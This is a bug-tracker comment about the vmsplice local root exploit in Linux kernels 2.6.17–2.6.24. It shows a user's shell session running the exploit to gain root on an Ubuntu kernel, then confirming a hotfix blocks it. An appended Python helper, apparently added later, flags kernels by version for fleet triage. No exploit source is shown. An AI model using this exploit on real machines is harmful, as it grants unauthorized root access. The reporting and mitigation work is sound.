[Bug 190587] Re: Local root exploit in kernel 2.6.17 - 2.6.24 (vmsplice)

Yuri ycsapo at mines.edu
Tue Feb 12 03:18:36 UTC 2008


Contrary to what I've been reading, I can confirm this on feisty, at
least with an AMD processor:

ycsapo at pie:~$ grep "model name" /proc/cpuinfo
model name      : Dual-Core AMD Opteron(tm) Processor 2218
model name      : Dual-Core AMD Opteron(tm) Processor 2218
model name      : Dual-Core AMD Opteron(tm) Processor 2218
model name      : Dual-Core AMD Opteron(tm) Processor 2218
ycsapo at pie:~$ uname -a
Linux pie 2.6.20-16-generic #2 SMP Thu Jan 31 22:39:18 UTC 2008 x86_64 GNU/Linux
ycsapo at pie:~$ ./exploit 
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x100000000000 .. 0x100000001000
[+] page: 0x100000000000
[+] page: 0x100000000038
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4038
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0x2ac0a9f0d000 .. 0x2ac0a9f3f000
[+] root
root at pie:~# whoami
root
root at pie:~# 

I also confirm the suggested hotfix (disable-vmsplice-if-exploitable.c)
works:

ycsapo at pie:~$ cc disable-vmsplice-if-exploitable.c 
ycsapo at pie:~$ ./a.out 
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x100000000000 .. 0x100000001000
[+] page: 0x100000000000
[+] page: 0x100000000038
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4038
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0x2acad5163000 .. 0x2acad5195000
[+] root
Exploit gone!
ycsapo at pie:~$ ./exploit 
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x100000000000 .. 0x100000001000
[+] page: 0x100000000000
[+] page: 0x100000000038
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4038
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0x2b010025b000 .. 0x2b010028d000
[-] vmsplice
ycsapo at pie:~$ whoami
ycsapo

-- 
Local root exploit in kernel 2.6.17 - 2.6.24 (vmsplice)
https://bugs.launchpad.net/bugs/190587
You received this bug notification because you are a member of Kernel
Bugs, which is a bug contact for linux-source-2.6.15 in ubuntu.
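The report above identifies an affected kernel purely from the `uname -a` line, so here is an added triage helper (not part of the bug report or of any Ubuntu tooling) that parses a kernel release string and reports whether its base version falls in the 2.6.17 through 2.6.24 range named in the bug title. It assumes both bounds are inclusive and deliberately ignores the stable point-release and distribution suffixes (`2.6.24.2`, `-16-generic`), so a hit means "check the vendor advisory and the hotfix status for this host", not "confirmed vulnerable", because distribution kernels carry backported fixes the version number alone does not reveal. The sample input is the `uname -a` line quoted in the report.

```python
import re

# Affected base-kernel range as stated in the bug title (assumed inclusive).
VMSPLICE_AFFECTED_MIN = (2, 6, 17)
VMSPLICE_AFFECTED_MAX = (2, 6, 24)

# Leading "major.minor.patch"; anything after (".2", "-16-generic", "-rc1") is ignored.
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)")


def parse_kernel_version(release: str) -> tuple:
    """Return (major, minor, patch) from a release string such as
    '2.6.20-16-generic'. Raises ValueError on anything else."""
    m = _VERSION_RE.match(release.strip())
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return tuple(int(x) for x in m.groups())


def release_from_uname_a(line: str) -> str:
    """Extract the release field (third whitespace-separated token) from a
    Linux 'uname -a' line."""
    fields = line.split()
    if len(fields) < 3 or fields[0] != "Linux":
        raise ValueError(f"not a Linux 'uname -a' line: {line!r}")
    return fields[2]


def in_vmsplice_affected_range(release: str) -> bool:
    """True when the base version lies in 2.6.17..2.6.24.
    Tuples compare numerically, so 2.6.9 < 2.6.17 is handled correctly;
    a plain string comparison would order '2.6.9' after '2.6.17'."""
    version = parse_kernel_version(release)
    return VMSPLICE_AFFECTED_MIN <= version <= VMSPLICE_AFFECTED_MAX


def triage(uname_a_line: str) -> dict:
    """Summarise one host's 'uname -a' line for an inventory sweep."""
    release = release_from_uname_a(uname_a_line)
    return {
        "release": release,
        "base_version": ".".join(str(n) for n in parse_kernel_version(release)),
        "in_affected_range": in_vmsplice_affected_range(release),
    }


if __name__ == "__main__":
    # Constructed sample: the 'uname -a' line quoted in the report above.
    sample = ("Linux pie 2.6.20-16-generic #2 SMP Thu Jan 31 22:39:18 UTC 2008 "
              "x86_64 GNU/Linux")
    print(triage(sample))
```

Run it over `uname -a` output collected from a fleet (one line per host) to build a list of machines that need the vendor update or the temporary hotfix verified; hosts that come back `in_affected_range: False` still need their vendor's advisory checked if they run a backported distribution kernel.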